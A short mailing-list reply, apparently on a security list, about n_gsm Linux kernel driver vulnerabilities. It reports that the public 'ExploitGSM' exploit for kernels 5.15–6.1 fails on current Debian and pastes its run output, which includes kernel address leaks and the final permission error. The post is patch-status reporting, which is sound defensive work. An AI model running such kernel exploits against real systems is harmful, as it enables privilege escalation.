On 16.04.24 at 22:16, Solar Designer wrote:
> I'm puzzled by the lack of follow-ups on this, but anyway @FFFVR_
> tweeted they also found (more) vulnerabilities in the n_gsm driver:

FWIW, YuriiCrimson's bug for 5.15 - 6.1 seems to be patched on current
Debian:
debianexploitgsm:/tmp/ExploitGSM/ExploitGSM_5_15_to_6_1$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-20-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65900116
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address -> ffffffff8546f1c0
text leaked address -> ffffffff83400000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
gsm_mux_event_offset -> 56
Error set line discipline N_GSM, Operation not permitted
--cku